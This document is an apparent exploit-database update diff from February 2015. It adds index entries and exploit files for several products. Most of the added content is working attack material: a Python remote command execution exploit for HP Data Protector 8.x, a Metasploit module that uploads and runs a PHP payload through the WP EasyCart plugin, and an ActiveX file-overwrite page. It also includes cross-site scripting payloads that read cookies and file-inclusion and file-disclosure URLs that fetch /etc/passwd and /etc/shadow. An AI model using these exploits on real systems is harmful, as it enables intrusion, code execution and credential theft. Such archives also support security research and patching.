Update: 2015-02-12

11 new exploits

files.csv

@@ -32467,7 +32467,6 @@ id,file,description,date,author,platform,type,port
 36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 -  'm3u' SEH Buffer Overflow PoC",2015-02-09,"Samandeep Singh",windows,dos,0
 36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection Vulnerability",2015-02-09,"ITAS Team",php,webapps,0
 36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption Vulnerability",2015-02-08,"Pablo González",linux,dos,0
-36025,platforms/php/webapps/36025.txt,"u5CMS 3.9.3 - Multiple Open Redirect Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
 36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
 36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injection Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
 36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
@@ -32483,3 +32482,13 @@ id,file,description,date,author,platform,type,port
 36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0
 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80
 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80
+36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
+36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
+36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
+36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0
+36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross Site Scripting Vulnerability",2011-08-17,Ehsan_Hp200,php,webapps,0
+36047,platforms/php/webapps/36047.txt,"awiki 20100125 Multiple Local File Include Vulnerabilities",2011-08-15,muuratsalo,php,webapps,0
+36048,platforms/php/webapps/36048.txt,"PHPList 2.10.x Security Bypass and Information Disclosure Vulnerabilities",2011-08-15,"Davide Canali",php,webapps,0
+36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2011-08-17,"High-Tech Bridge SA",windows,remote,0
+36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 'index.php' Cross Site Scripting Vulnerability",2011-08-17,"High-Tech Bridge SA",php,webapps,0
+36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0

platforms/cgi/remote/36045.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/49160/info
+
+SurgeFTP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+SurgeFTP 23b6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname="<script>alert('XSS');</script>
+http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&last="<script>alert('XSS');</script>
+http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&class_name="<script>alert('XSS');</script>
+http://www.example.com/cgi/surgeftpmgr.cgi?cmd=report_file&domainid=0&filter="<script>alert('XSS');</script>
+http://www.example.com/cgi/surgeftpmgr.cgi?cmd=user_admin&domainid="<script>alert('XSS');</script>
+http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid="<script>alert('XSS');</script>
+

platforms/hardware/webapps/36042.txt

@@ -0,0 +1,27 @@
+----------------------------------------------------------------------
+Title		: LG DVR LE6016D - Remote File Disclosure Vulnerability (0day)
+CVE-ID		: none
+Product		: LG
+Affected 	: All versions
+Impact		: Critical
+Remote		: Yes
+Product link: http://www.lgecommercial.com/security-en/products/analog-product/analog-dvr/lg-LE6016D
+Reported	: 10/02/2015
+Author		: Yakir Wizman, yakir.wizman@gmail.com
+
+
+Vulnerability description:
+----------------------------------------------------------------------
+No authentication (login) is required to exploit this vulnerability. 
+The LG DVR application is prone to a remote file disclosure vulnerability.
+An attacker can exploit this vulnerability to retrieve stored files on server such as '/etc/passwd' and '/etc/shadow' by using a simple url request which made by browser.
+More over, an attacker may be able to compromise encrypted login credentials for or retrieve the device's administrator password allowing them to directly access the device's configuration control panel.
+
+
+Proof of concept:
+----------------------------------------------------------------------
+The following simple url request will retrieve '/etc/shadow' file:
+http://127.0.0.1:1234/etc/shadow
+
+
+~eof.

platforms/hp-ux/remote/35961.py

@@ -0,0 +1,69 @@
+#!/usr/bin/python
+
+# Exploit Title: HP-Data-Protector-8.x Remote command execution.
+# Google Dork: -
+# Date: 30/01/2015
+# Exploit Author: Juttikhun Khamchaiyaphum
+# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
+# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
+# Version: 8.x
+# Tested on: IA64 HP Server Rx3600
+# CVE : CVE-2014-2623
+# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
+
+import socket
+import struct
+import sys
+
+def exploit(host, port, command):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.connect((host, port))
+        print "[+] Target connected."
+
+        OFFSET_DEC_START = 133
+        OFFSET_DEC = (OFFSET_DEC_START + len(command))
+        # print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
+        # print "len(command)" + str(len(command))
+        # print "OFFSET_DEC" + str(OFFSET_DEC)
+        OFFSET_HEX = "%x" % OFFSET_DEC
+        # print "OFFSET_HEX" + str(OFFSET_HEX)
+        OFFSET_USE = chr(OFFSET_DEC)
+        # print "Command Length: " + str(len(command))
+        PACKET_DATA = "\x00\x00\x00"+\
+        OFFSET_USE+\
+        "\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
+        "\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
+        "\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
+        "\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
+        "\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
+        "\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
+        "\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
+        "\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
+        " %s\x00" %command
+
+        # Send payload to target
+        print "[+] Sending PACKET_DATA"
+        sock.sendall(PACKET_DATA)
+
+        # Parse the response back
+        print "[*] Result:"
+        while True:
+            response = sock.recv(2048)
+            if not response: break
+            print response
+
+    except Exception as ex:
+        print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
+        exit(-3)
+    sock.close()
+
+if __name__ == "__main__":
+    try:
+        target = sys.argv[1]
+        port = int(sys.argv[2])
+        command = sys.argv[3]
+        exploit(target, port, command)
+    except IndexError:
+         print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
+    exit(0)

platforms/php/webapps/36043.rb

@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress WP EasyCart Unrestricted File Upload',
+      'Description'     => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
+                              WordPress contains a flaw that allows a remote
+                              attacker to execute arbitrary PHP code. This
+                              flaw exists because the
+                              /inc/amfphp/administration/banneruploaderscript.php
+                              script does not properly verify or sanitize
+                              user-uploaded files. By uploading a .php file,
+                              the remote system will place the file in a
+                              user-accessible path. Making a direct request to
+                              the uploaded file will allow the attacker to
+                              execute the script with the privileges of the web
+                              server.
+
+                              In versions <= 3.0.8 authentication can be done by
+                              using the WordPress credentials of a user with any
+                              role. In later versions, a valid EasyCart admin
+                              password will be required that is in use by any
+                              admin user. A default installation of EasyCart will
+                              setup a user called "demouser" with a preset password
+                              of "demouser".},
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Kacper Szurek',                  # Vulnerability disclosure
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['OSVDB', '116806'],
+          ['WPVDB', '7745']
+        ],
+      'DisclosureDate'  => 'Jan 08 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['wp-easycart', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']),
+        OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']),
+        OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']),
+        OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false])
+      ], self.class)
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def ec_password
+    datastore['EC_PASSWORD']
+  end
+
+  def ec_password_is_hash
+    datastore['EC_PASSWORD_IS_HASH']
+  end
+
+  def use_wordpress_authentication
+    username.to_s != '' && password.to_s != ''
+  end
+
+  def use_ec_authentication
+    ec_password.to_s != ''
+  end
+
+  def req_id
+    if ec_password_is_hash
+      return ec_password
+    else
+      return Rex::Text.md5(ec_password)
+    end
+  end
+
+  def generate_mime_message(payload, date_hash, name, include_req_id)
+    data = Rex::MIME::Message.new
+    data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
+    data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
+    data
+  end
+
+  def setup
+    if !use_wordpress_authentication && !use_ec_authentication
+      fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
+    end
+
+    super
+  end
+
+  def exploit
+    vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
+    vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication
+
+    if use_wordpress_authentication && use_ec_authentication
+      print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...")
+    end
+
+    if use_wordpress_authentication
+      print_status("#{peer} - Authenticating using #{username}:#{password}...")
+      cookie = wordpress_login(username, password)
+
+      if !cookie
+        if use_ec_authentication
+          print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
+        else
+          fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
+        end
+      else
+        print_good("#{peer} - Authenticated with WordPress")
+      end
+    end
+
+    print_status("#{peer} - Preparing payload...")
+    payload_name = Rex::Text.rand_text_alpha(10)
+    date_hash = Rex::Text.md5(Time.now.to_s)
+    uploaded_filename = "#{payload_name}_#{date_hash}.php"
+    plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
+    uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
+    payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
+    data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)
+
+    print_status("#{peer} - Uploading payload to #{payload_url}")
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => uploader_url,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => data.to_s,
+      'cookie'  => cookie
+    )
+
+    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
+    vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+
+    print_status("#{peer} - Executing the payload...")
+    register_files_for_cleanup(uploaded_filename)
+    res = send_request_cgi(
+    {
+      'uri'     => payload_url,
+      'method'  => 'GET'
+    }, 5)
+
+    if !res.nil? && res.code == 404
+      print_error("#{peer} - Failed to upload the payload")
+    else
+      print_good("#{peer} - Executed payload")
+    end
+  end
+end

platforms/php/webapps/36044.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49138/info
+
+PHP Flat File Guestbook is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 
+
+http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell? 

platforms/php/webapps/36046.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49176/info
+
+phpWebSite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/mod.php?mod=userpage&page_id=[XSS] 

platforms/php/webapps/36047.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/49187/info
+
+awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+awiki 20100125 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/awiki/index.php?page=/etc/passwd
+http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd 

platforms/php/webapps/36048.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/49188/info
+
+PHPList is prone to a security-bypass vulnerability and an information-disclosure vulnerability.
+
+An attacker can exploit these issues to gain access to sensitive information and send arbitrary messages to registered users. Other attacks are also possible. 
+
+http://www.example.com/lists/?p=forward&uid=VALID_UID&mid=ID
+http://www.example.com/lists/?p=forward&uid=foo&mid=ID 

platforms/php/webapps/36050.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49193/info
+
+The Fast Secure Contact Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to Fast Secure Contact Form 3.0.3.2 are vulnerable. 
+
+http://www.example.com/wp-content/plugins/si-contact-form/captcha/test/index.php/%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E

platforms/php/webapps/36051.txt

@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/49197/info
+
+WP-Stats-Dashboard is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+WP-Stats-Dashboard 2.6.5.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]

platforms/windows/remote/36049.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49192/info
+
+StudioLine Photo Basic ActiveX is prone to an arbitrary-file-overwrite vulnerability.
+
+Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
+
+StudioLine Photo Basic 3.70.34.0 is vulnerable; other versions may also be affected. 
+
+<html> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_corrupt_or_create" arg2=True target.EnableLog arg1 ,arg2 End Sub </script> </html>